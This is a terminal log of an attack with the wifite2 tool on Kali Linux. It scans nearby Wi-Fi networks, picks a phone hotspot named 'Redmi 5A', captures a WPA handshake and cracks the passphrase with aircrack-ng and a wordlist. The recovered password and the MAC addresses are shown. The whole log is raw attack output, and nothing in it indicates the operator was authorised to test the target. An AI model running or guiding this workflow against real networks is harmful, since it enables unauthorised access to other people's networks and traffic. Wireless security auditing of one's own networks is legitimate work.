┌──(root㉿kali)-[/usr/share/wordlists]
└─# wifite
   .               .    
 .´  ·  .     .  ·  `.  wifite2 2.6.6
 :  :  :  (¯)  :  :  :  a wireless auditor by derv82
 `.  ·  ` /¯\ ´  ·  .´  maintained by kimocoder
   `     /¯¯¯\     ´    https://github.com/kimocoder/wifite2

 [!] Warning: Recommended app hcxdumptool was not found. install @ apt install hcxdumptool
 [!] Warning: Recommended app hcxpcapngtool was not found. install @ apt install hcxtools

 [+] Using wlan0 already in monitor mode                                                                                                                    

   NUM                      ESSID   CH  ENCR    PWR    WPS  CLIENT                                                                                          
   ---  -------------------------  ---  -----   ----   ---  ------
     1                 SmartHome     6  WPA-P   68db   yes    6                                                                                             
     2                  Redmi 5A     1  WPA-P   57db    no    1                                                                                             
     3       (B6:A7:C6:92:2A:F8)     1  WPA-P    7db    no                                                                                                  
 [+] Select target(s) (1-3) separated by commas, dashes or all: 2                                                                                           

 [+] (1/1) Starting attacks against 80:35:C1:B7:1D:5D (Redmi 5A)
 [!] Skipping PMKID attack, missing required tools: hcxdumptool, hcxpcapngtool
 [+] Redmi 5A (65db) WPA Handshake capture: Discovered new client: 78:0C:B8:C9:37:F9                                                                        
 [+] Redmi 5A (67db) WPA Handshake capture: Captured handshake                                                                                              
 [+] saving copy of handshake to hs/handshake_Redmi5A_80-35-C1-B7-1D-5D_2022-12-22T10-10-23.cap saved

 [+] analysis of captured handshake file:
 [+]   tshark: .cap file contains a valid handshake for (80:35:c1:b7:1d:5d)
 [+] aircrack: .cap file contains a valid handshake for (80:35:C1:B7:1D:5D)

 [+] Cracking WPA Handshake: Running aircrack-ng with wordlist-probable.txt wordlist
 [+] Cracking WPA Handshake: 100.00% ETA: 0s @ 3457.2kps (current key: 16401640)                                                                            
 [+] Cracked WPA Handshake PSK: redmi123

 [+]   Access Point Name: Redmi 5A
 [+]  Access Point BSSID: 80:35:C1:B7:1D:5D
 [+]          Encryption: WPA
 [+]      Handshake File: hs/handshake_Redmi5A_80-35-C1-B7-1D-5D_2022-12-22T10-10-23.cap
 [+]      PSK (password): redmi123
 [+] saved crack result to cracked.json (1 total)
 [+] Finished attacking 1 target(s), exiting
